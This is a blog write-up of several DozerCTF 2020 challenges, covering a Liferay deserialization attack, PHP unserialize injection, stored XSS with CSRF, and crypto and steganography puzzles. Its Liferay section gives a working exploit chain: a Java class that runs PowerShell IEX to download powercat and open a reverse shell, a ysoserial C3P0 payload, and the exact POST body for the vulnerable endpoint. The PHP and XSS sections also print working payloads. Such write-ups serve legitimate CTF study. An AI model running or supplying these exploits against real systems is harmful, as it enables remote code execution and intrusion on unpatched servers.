DozerCTF

2020-06-15 14:06:00
ctf - wp - DozerCTF

Simple Domain Pentest 1

First blood; feels like an unintended solve? Early on I got a shell straight away with powercat, but afterwards I could not get one back no matter what I tried.

Liferay CVE: CVE-2020-7961

public class Exploit {

    // Static initializer: runs as soon as the class is loaded by the deserialization gadget
    static {
        try {
            // Fetch powercat and connect back to the listener with cmd.exe bound to the socket
            // (replace ip/port with the listener address)
            String[] cmd = {"cmd.exe", "/c", "powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c ip -p port -e cmd"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

First compile Exploit into a .class file and host it on a VPS: python -m SimpleHTTPServer 18888

Generate a C3P0 payload with ysoserial:

java -jar ysoserial-master-30099844c6-1.jar C3P0 "http://ip:port/:Exploit" > payload.out

Then convert it to hex:

import java.io.*;

public class poc {
    // Encode every byte of the stream as two lowercase hex digits
    public String encodeHex(InputStream fi) throws IOException {
        int b;
        StringBuilder hexStr = new StringBuilder();
        while ((b = fi.read()) != -1) {
            String byteChar = Integer.toHexString(b);
            if (byteChar.length() < 2) {
                byteChar = "0" + byteChar;   // left-pad single-digit values
            }
            hexStr.append(byteChar);
        }
        return hexStr.toString();
    }

    public static void main(String[] args) throws IOException {
        // the ysoserial output file; pass a different path as the first argument
        String path = args.length > 0 ? args[0] : "C:\\Users\\DELL\\Desktop\\payload.bin";
        try (FileInputStream fi = new FileInputStream(new File(path))) {
            poc obj = new poc();
            System.out.println(obj.encodeHex(fi));
        }
    }
}

POST the resulting hex string to /api/jsonws/invoke:

cmd={"/expandocolumn/add-column":{}}&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:<hex string>;"}

An nc listener on the server catches the shell; the first flag is on the desktop:

Dozerctf{a993e8ce377e05b2cbfa460e43e43757}

Giveaway Deserialization

<?php
class home
{
    private $method;
    private $args;
    function __construct($method, $args)
    {
        $this->method = $method;
        $this->args = $args;
    }

    // Runs when the object is freed: calls $this->$method(...$this->args) as long as
    // the method name is on the allow-list (only "mysys")
    function __destruct()
    {
        if (in_array($this->method, array("mysys"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }

    // Sink: $path is concatenated straight into a shell command
    function mysys($path)
    {
        print_r(base64_encode(exec("cat $path")));
    }
    function waf($str)
    {
        if (strlen($str) > 8) {
            die("No");
        }
        return $str;
    }

    // Runs during unserialize(): every arg is trimmed and limited to 8 bytes,
    // and a third arg aborts
    function __wakeup()
    {
        $num = 0;
        foreach ($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
            $num += 1;
            if ($num > 2) {
                die("No");
            }
        }
    }
}

if ($_GET['path']) {
    $path = @$_GET['path'];
    unserialize($path);
} else {
    highlight_file(__FILE__);

}
?>

A standard deserialization challenge: __destruct reaches call_user_func_array, which invokes mysys and cats flag.php. The only constraints are in __wakeup: at most two args, each no longer than 8 bytes after trim, and "flag.php" is exactly 8. The properties are private, so the serialized keys carry \0home\0 prefixes; URL-encode the string and send it straight in via GET.

exp:

<?php
// Same class shape as the target, minus the magic methods, so serialize()
// produces the private-property layout the target expects
class home
{
    private $method;
    private $args;
    function __construct($method, $args)
    {
        $this->method = $method;
        $this->args = $args;
    }

}

$a = new home("mysys", ['flag.php']);
echo urlencode(serialize($a));
?>
O%3A4%3A%22home%22%3A2%3A%7Bs%3A12%3A%22%00home%00method%22%3Bs%3A5%3A%22mysys%22%3Bs%3A10%3A%22%00home%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22flag.php%22%3B%7D%7D
PD9waHAgJGZsYWcgPSAnZmxhZ3tqNG5jOTIwZm04YjJ6MHIybWM3ZHNmODdzNjc4NWE2NzVzYTc3NnZkfSc7Pz4=
<?php $flag = 'flag{j4nc920fm8b2z0r2mc7dsf87s6785a675sa776vd}';?>
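As an added example (my code, not the write-up's), the same payload generated without PHP, with the __wakeup limits checked up front so an over-long path is caught before it is sent. Python's strip() is used as a stand-in for PHP's trim(); for flag.php the output is identical to the urlencode(serialize()) result above.

```python
from typing import List
from urllib.parse import quote


def php_serialize_home(method: str, args: List[str]) -> str:
    """Hand-built serialize() output for a `home` object. Private properties
    are keyed "\\0home\\0name", and the string length counts the two NUL bytes."""
    def s(v: str) -> str:
        return 's:%d:"%s";' % (len(v.encode()), v)

    def priv(name: str) -> str:
        return s("\0home\0" + name)

    body = priv("method") + s(method)
    body += priv("args") + "a:%d:{" % len(args)
    for i, a in enumerate(args):
        body += "i:%d;" % i + s(a)
    body += "}"
    return 'O:4:"home":2:{%s}' % body


def wakeup_allows(args: List[str]) -> bool:
    """Mirror home::__wakeup: each arg <= 8 bytes after trim, no more than two args.
    (str.strip() approximates PHP trim(); it does not strip NUL bytes.)"""
    for n, a in enumerate(args, start=1):
        if len(a.strip().encode()) > 8 or n > 2:
            return False
    return True


def build_payload(path: str) -> str:
    """URL-encoded payload for ?path=, rejecting anything __wakeup would kill."""
    if not wakeup_allows([path]):
        raise ValueError("%r: longer than the 8-byte waf limit" % path)
    return quote(php_serialize_home("mysys", [path]), safe="")


if __name__ == "__main__":
    print(build_payload("flag.php"))
```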

Summer Plan

I'm not sure whether there was steganography up front; dragging the file into 360 extracted what should be the secret archive. The hint said to repair the password, i.e. repair the secret archive, and the file header looked corrupted, so I repaired it directly with WinRAR and got several secret files. Looking at them, the values run from 0 to 139 and not every number has a one-to-one counterpart; given the game theme, coordinates seemed quite likely.

Plot them with gnuplot:

plot "1.txt" lt 0

Since I don't really know how to use gnuplot, the black came out rather white, so I swapped the pen and background colours, then tweaked the colours in Photoshop: a Han Xin code.

The challenge author handed over the flag.
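An added example, not the author's code, of doing the gnuplot step offline in Python: read the "x y" pairs, rasterise them onto a grid and write a plain PBM, which already puts ink on a white background so nothing has to be inverted afterwards. The point list is a constructed 3x3 sample, not the challenge data; flip_y exists because image row 0 is the top while gnuplot's y axis grows upward.

```python
from typing import List, Tuple

# Constructed sample in the same "x y" per-line shape as the secret files;
# the real coordinates from the challenge are not reproduced here.
SAMPLE_POINTS = """0 0
1 0
2 0
0 1
2 1
0 2
1 2
2 2
"""


def parse_points(text: str) -> List[Tuple[int, int]]:
    """Parse whitespace-separated x y pairs, skipping blank and '#' lines."""
    pts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        x, y = line.split()[:2]
        pts.append((int(x), int(y)))
    return pts


def rasterize(points: List[Tuple[int, int]], invert: bool = False,
              flip_y: bool = False) -> List[List[int]]:
    """Grid of 0/1 (1 = ink) covering the bounding box of the points.
    invert swaps ink and background; flip_y puts y=0 at the bottom like gnuplot."""
    w = max(x for x, _ in points) + 1
    h = max(y for _, y in points) + 1
    ink, paper = (0, 1) if invert else (1, 0)
    grid = [[paper] * w for _ in range(h)]
    for x, y in points:
        row = h - 1 - y if flip_y else y
        grid[row][x] = ink
    return grid


def to_pbm(grid: List[List[int]]) -> str:
    """Plain PBM (P1): 1 is black, so the file opens directly as black dots on white."""
    h, w = len(grid), len(grid[0])
    rows = "\n".join(" ".join(str(v) for v in row) for row in grid)
    return "P1\n%d %d\n%s\n" % (w, h, rows)


if __name__ == "__main__":
    print(to_pbm(rasterize(parse_points(SAMPLE_POINTS))), end="")
```

For a 140x140 module code the PBM is tiny; scale it up in any image editor (nearest-neighbour, no smoothing) before handing it to a Han Xin decoder.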

Fake phpMiniAdmin

Poking around turned up an admin_shark.php.

Created a table and found that both angle brackets of script were filtered, so I inserted the payload as hex. Inserting with concat and chr should also work, but I did not try it.

select hex('<script>alert(1)</script>');
//3C7363726970743E616C6572742831293C2F7363726970743E

When inserting:

insert into hhhm123 values(1,unhex('3C7363726970743E616C6572742831293C2F7363726970743E'));
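An added example (not from the write-up) that generates both bypass forms: the unhex() literal used above and the concat(char(...)) one the text mentions but does not try, plus a check that the finished statement carries no angle brackets. The table name and id are the ones from the insert above; the filter itself is only modelled as "rejects < and >", which is all the page observes.

```python
def hex_literal(s: str) -> str:
    """MySQL unhex('...') form of a string; the statement text has no '<' or '>'."""
    return "unhex('%s')" % s.encode().hex().upper()


def char_literal(s: str) -> str:
    """The concat(char(...)) alternative: one char(n) per byte."""
    return "concat(%s)" % ",".join("char(%d)" % b for b in s.encode())


def build_insert(table: str, row_id: int, payload: str, style: str = "hex") -> str:
    """Insert statement whose second column is the payload in the chosen encoding."""
    if style == "hex":
        lit = hex_literal(payload)
    elif style == "char":
        lit = char_literal(payload)
    else:
        raise ValueError("style must be 'hex' or 'char'")
    return "insert into %s values(%d,%s);" % (table, row_id, lit)


def passes_bracket_filter(stmt: str) -> bool:
    """Model of the filter seen on the challenge: the input must not contain '<' or '>'."""
    return "<" not in stmt and ">" not in stmt


if __name__ == "__main__":
    xss = "<script>alert(1)</script>"
    for style in ("hex", "char"):
        stmt = build_insert("hhhm123", 1, xss, style)
        print(passes_bracket_filter(stmt), stmt)
```

Either form stores the literal `<script>` bytes in the row, so the filter only ever sees the statement text; whatever renders the column later is what gets the XSS.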

The approach is much like the note challenge in bbctf: XSS + CSRF against the admin.

Host an auto-submitting form on the VPS:

...
<input type="hidden" name="hhh" value="select * from hhhm123" />
...

For details see: https://www.cnblogs.com/afanti/p/8277344.html

Grabbing the page source returned the flag:

Dozerctf{eed8cdc400dfd4ec85dff70a170066b7}

Sign-in

Click the magic wand in CyberChef and the flag pops out in one go (:

Dozerctf{base_family_is_so_good}

Something Seems Off

A custom base64:

OEG7U19kUvCsV29qzT9qcUm0yDCwy2CiWjOrU2Or

CyberChef again, base64 with a different alphabet:

Dr{__g_!ocomiom}ztlasoaefdn_dn

Rail fence cipher, shift 4:

Dozerctf{old_man_is_good_man!}
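The page does not reproduce the swapped alphabet, so the added example below (mine, not the author's) recovers the partial table from the page's own ciphertext/intermediate pair, decodes with it, and then inverts the transposition. For these two strings the step the page calls a rail fence is a columnar one: the plaintext was written in rows of four and read down the columns, so decryption splits the ciphertext into four columns (the first n mod 4 of them one character longer) and reads across. The table is partial: only characters that occur in the ciphertext are learned, and any other character raises.

```python
import base64
import string

STD = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

# Strings from the write-up: the custom-base64 ciphertext and the intermediate it decodes to
CIPHER = "OEG7U19kUvCsV29qzT9qcUm0yDCwy2CiWjOrU2Or"
INTERMEDIATE = "Dr{__g_!ocomiom}ztlasoaefdn_dn"


def recover_table(cipher: str, known: bytes) -> dict:
    """Map each custom-alphabet character to its 6-bit value by lining the
    ciphertext up with the standard-alphabet encoding of the known plaintext."""
    std = base64.b64encode(known).decode().rstrip("=")
    cipher = cipher.rstrip("=")
    if len(std) != len(cipher):
        raise ValueError("ciphertext and known plaintext have different lengths")
    table = {}
    for c, s in zip(cipher, std):
        v = STD.index(s)
        if table.setdefault(c, v) != v:
            raise ValueError("%r would map to two values; not a plain alphabet swap" % c)
    return table


def custom_b64decode(cipher: str, table: dict) -> bytes:
    """Decode with a (possibly partial) alphabet table; '=' padding is ignored."""
    bits = []
    for c in cipher.rstrip("="):
        if c not in table:
            raise ValueError("no mapping for %r; extend the table" % c)
        bits.append(format(table[c], "06b"))
    bits = "".join(bits)
    usable = len(bits) - len(bits) % 8          # drop the trailing partial byte
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def columnar_decrypt(ct: str, k: int) -> str:
    """Invert 'write the plaintext in rows of k, read down the columns'."""
    n = len(ct)
    rows, rem = divmod(n, k)
    col_lens = [rows + (1 if c < rem else 0) for c in range(k)]
    cols, pos = [], 0
    for length in col_lens:
        cols.append(ct[pos:pos + length])
        pos += length
    out = []
    for r in range(rows + (1 if rem else 0)):
        for c in range(k):
            if r < col_lens[c]:
                out.append(cols[c][r])
    return "".join(out)


def solve(cipher: str, known: bytes, k: int = 4) -> str:
    table = recover_table(cipher, known)
    return columnar_decrypt(custom_b64decode(cipher, table).decode(), k)


if __name__ == "__main__":
    print(solve(CIPHER, INTERMEDIATE.encode()))
```

Printing the recovered table shows the pattern CyberChef's alphabet swap hides: letters land three places earlier in their own case while digits are unchanged.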

Python?

Height repair + Stegsolve Data Extract + base64.
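An added example (not the write-up's code) of the height-repair step. It builds a small greyscale PNG whose IHDR height has been hand-edited without touching the CRC, the way such challenge images usually look, then recovers the real height two ways: brute-forcing the height until the IHDR CRC matches, and counting the rows actually present in the decompressed IDAT data. Finally it rewrites IHDR with a correct CRC. Non-interlaced images are assumed in the row count.

```python
import struct
import zlib
from typing import Optional, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """length + type + data + CRC32(type + data), the PNG chunk layout."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png(width: int, height: int, stored_height: Optional[int] = None) -> bytes:
    """Constructed sample: solid grey, 8-bit greyscale, non-interlaced. With
    stored_height set, the IHDR height bytes are overwritten but the CRC is left
    as computed for the true height, i.e. a hand-edited challenge image."""
    raw = b"".join(b"\x00" + b"\x80" * width for _ in range(height))  # filter byte 0 per row
    ihdr = _chunk(b"IHDR", struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0))
    if stored_height is not None:
        ihdr = ihdr[:12] + struct.pack(">I", stored_height) + ihdr[16:]
    return PNG_SIG + ihdr + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def _ihdr(png: bytes) -> Tuple[bytes, int]:
    """Return (IHDR data, stored CRC); IHDR must be the first chunk."""
    if png[:8] != PNG_SIG or png[12:16] != b"IHDR":
        raise ValueError("not a PNG with a leading IHDR")
    length = struct.unpack(">I", png[8:12])[0]
    data = png[16:16 + length]
    stored_crc = struct.unpack(">I", png[16 + length:20 + length])[0]
    return data, stored_crc


def ihdr_height_and_crc_ok(png: bytes) -> Tuple[int, bool]:
    """Height as declared in IHDR, and whether its CRC matches (pngcheck's complaint)."""
    data, stored = _ihdr(png)
    height = struct.unpack(">I", data[4:8])[0]
    return height, (zlib.crc32(b"IHDR" + data) & 0xFFFFFFFF) == stored


def recover_height_from_crc(png: bytes, max_height: int = 10000) -> Optional[int]:
    """Try every height until the IHDR CRC matches; works when only the height bytes were edited."""
    data, stored = _ihdr(png)
    buf = bytearray(data)
    for h in range(1, max_height + 1):
        buf[4:8] = struct.pack(">I", h)
        if (zlib.crc32(b"IHDR" + bytes(buf)) & 0xFFFFFFFF) == stored:
            return h
    return None


def height_from_idat(png: bytes) -> int:
    """Count the rows present in the pixel data (non-interlaced images only)."""
    data, _ = _ihdr(png)
    width, _, depth, colour = struct.unpack(">IIBB", data[:10])
    channels = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}[colour]
    row_bytes = 1 + (width * channels * depth + 7) // 8   # filter byte + packed pixels
    pos, idat = 8, b""
    while pos + 8 <= len(png):
        length = struct.unpack(">I", png[pos:pos + 4])[0]
        if png[pos + 4:pos + 8] == b"IDAT":
            idat += png[pos + 8:pos + 8 + length]
        pos += 12 + length
    return len(zlib.decompress(idat)) // row_bytes


def fix_png_height(png: bytes, new_height: int) -> bytes:
    """Write new_height into IHDR and recompute the chunk CRC."""
    data, _ = _ihdr(png)
    buf = bytearray(data)
    buf[4:8] = struct.pack(">I", new_height)
    crc = struct.pack(">I", zlib.crc32(b"IHDR" + bytes(buf)) & 0xFFFFFFFF)
    return png[:16] + bytes(buf) + crc + png[20 + len(data):]


if __name__ == "__main__":
    broken = make_png(4, 6, stored_height=2)
    print(ihdr_height_and_crc_ok(broken), recover_height_from_crc(broken), height_from_idat(broken))
    fixed = fix_png_height(broken, height_from_idat(broken))
    print(ihdr_height_and_crc_ok(fixed))
```

The CRC search only helps when the author edited the height and nothing else; if the CRC was fixed up too, the IDAT row count is the fallback, and for a real file it is the more reliable of the two.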

Questionnaire



This post was originally published on HhhM's blog; please credit the source when reposting.



Copyright © 2019 HhhM